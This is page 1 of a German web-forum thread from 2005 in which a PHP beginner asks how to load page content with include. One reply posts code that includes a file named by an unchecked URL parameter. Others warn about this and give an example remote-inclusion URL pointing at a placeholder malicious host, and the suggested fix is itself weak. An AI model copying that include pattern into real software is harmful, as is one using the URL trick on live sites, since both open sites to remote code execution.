mediengestalter.info
FAQ :: Mitgliederliste :: MGi Team

Willkommen auf dem Portal für Mediengestalter

Aktuelles Datum und Uhrzeit: Sa 03.12.2016 08:01 Benutzername: Passwort: Auto-Login

Thema: [PHP NOOB braucht hilfe ] content includen? vom 09.01.2005


Neues Thema eröffnen   Neue Antwort erstellen MGi Foren-Übersicht -> Programmierung -> [PHP NOOB braucht hilfe ] content includen?
Seite: 1, 2, 3, 4, 5  Weiter
Autor Nachricht
daniel.ocean
Threadersteller

Dabei seit: 04.03.2003
Ort: Sydney
Alter: 31
Geschlecht: Männlich
Verfasst So 09.01.2005 14:57
Titel

[PHP NOOB braucht hilfe ] content includen?

Antworten mit Zitat Zum Seitenanfang

hallo!

habe da in meiner html seite ein menü mit 7 links. ich will den content in eine tabelle laden lassen, bin schon soweit das ich das mit php include machen kann ( muss ). also im prinzip wie ein iframe nur ohne iframe =) die tabellenzeile sollte sich natürlich der größe des inhaltes anpassen.

da ich keine ahnung von php habe wüsste ich gerne wie genau ich das machen muss, ein beispiel wäre ganz cool.
google hat mich nicht wirklich weitergebracht =/


thx
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
aUDIOfREAK

Dabei seit: 04.04.2002
Ort: Ansbach
Alter: 36
Geschlecht: Männlich
Verfasst So 09.01.2005 15:28
Titel

Antworten mit Zitat Zum Seitenanfang

zuerstmal musst du die html-datei in eine .php datei umbenennen.

dann einfach an der stelle wo du includen willst <? include "zuincludendedatei.php"; ?> - das wars auch schon *zwinker*
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
Anzeige
Anzeige
daniel.ocean
Threadersteller

Dabei seit: 04.03.2003
Ort: Sydney
Alter: 31
Geschlecht: Männlich
Verfasst So 09.01.2005 15:44
Titel

Antworten mit Zitat Zum Seitenanfang

naja da sollen ja unterschiedliche php dateien rein?

also eben menü mit 7 punkten die alle den content ins gleiche <td> laden


Zuletzt bearbeitet von daniel.ocean am So 09.01.2005 15:44, insgesamt 1-mal bearbeitet
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
synni

Dabei seit: 31.07.2003
Ort: koeln
Alter: 31
Geschlecht: Männlich
Verfasst So 09.01.2005 16:10
Titel

Antworten mit Zitat Zum Seitenanfang

also deine links legst' du so an:

das soll in deinen navigationbereich:

Code:
<a href="index.php?page=inhalt1" target="_self">   //index.php oder wie deine php datei heißt
<a href="index.php?page=inhalt2" target="_self">
<a href="index.php?page=inhalt3" target="_self">
<a href="index.php?page=inhalt4" target="_self">


dein include bereich in der <td> sollte so sein:

Code:

<?php

if(isset($page))
{
include $page.".php";   //content wird entsprechend den links geladen, zB inhalt1, etc.
}
else
{
include $startseite.".php"    // seite die angezeigt wird, wenn keine Variable übergeben wurde
}

?>   



die dateien die include werden sollen müssen wie die links heißen, nur mit der dateiendung noch hinzu: inhalt1.php, inhalt2.php, etc

so sollte es funktionieren *hehe*


Zuletzt bearbeitet von synni am So 09.01.2005 16:11, insgesamt 1-mal bearbeitet
  View user's profile Private Nachricht senden
Account gelöscht


Ort: -
Alter: -
Verfasst So 09.01.2005 16:35
Titel

Antworten mit Zitat Zum Seitenanfang

ich sachs immer wieder: www.php-faq.de, speziell hier: http://www.php-faq.de/ch/ch-general.html
 
Eistee
Administrator

Dabei seit: 31.10.2001
Ort: Grimma
Alter: 38
Geschlecht: Männlich
Verfasst So 09.01.2005 17:41
Titel

Antworten mit Zitat Zum Seitenanfang

synni hat geschrieben:
also deine links legst' du so an:

das soll in deinen navigationbereich:

Code:
<a href="index.php?page=inhalt1" target="_self">   //index.php oder wie deine php datei heißt
<a href="index.php?page=inhalt2" target="_self">
<a href="index.php?page=inhalt3" target="_self">
<a href="index.php?page=inhalt4" target="_self">


dein include bereich in der <td> sollte so sein:

Code:

<?php

if(isset($page))
{
include $page.".php";   //content wird entsprechend den links geladen, zB inhalt1, etc.
}
else
{
include $startseite.".php"    // seite die angezeigt wird, wenn keine Variable übergeben wurde
}

?>   



die dateien die include werden sollen müssen wie die links heißen, nur mit der dateiendung noch hinzu: inhalt1.php, inhalt2.php, etc

so sollte es funktionieren *hehe*


Nie nie nie ungeprüfte Vars in ein include etc übernehmen!
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
synni

Dabei seit: 31.07.2003
Ort: koeln
Alter: 31
Geschlecht: Männlich
Verfasst So 09.01.2005 17:52
Titel

Antworten mit Zitat Zum Seitenanfang

Eistee hat geschrieben:
Nie nie nie ungeprüfte Vars in ein include etc übernehmen!


wenn es sicher sein soll, kann man das ganze auch mit der case-funktion machen

oder was meinst du mit ungeprüft?
  View user's profile Private Nachricht senden
pRiMUS

Dabei seit: 09.09.2003
Ort: Vienna
Alter: 41
Geschlecht: Männlich
Verfasst So 09.01.2005 18:13
Titel

Antworten mit Zitat Zum Seitenanfang

mit ungeprüft meinte er sowas wie

html_entity($var)

und/oder

if (file_exists($var))
include ($var);

denn wenn du sonst allow_url_fopen = 1 hast, dann könnte man bei dir sowas wie

index.php?page=http://www.boeseurl.com/totalboesesscript.php

machen und du hättest unter umständen ne menge ärger am pobbers.
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
 
Ähnliche Themen [PHP] UPDATE meinetabelle SET .... noob braucht hilfe
[flash] as-noob braucht hilfe für pendel-animation
[Frage] Wie PHP-Datei in HTML-Seite includen
[noob] Aufbau einer Galerie mit PHP
OOP in PHP für Noob - Formulardaten verarbeiten
[jsp] php in jsp-seite includen
Neues Thema eröffnen   Neue Antwort erstellen Seite: 1, 2, 3, 4, 5  Weiter
MGi Foren-Übersicht -> Programmierung


Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst an Umfragen in diesem Forum nicht mitmachen.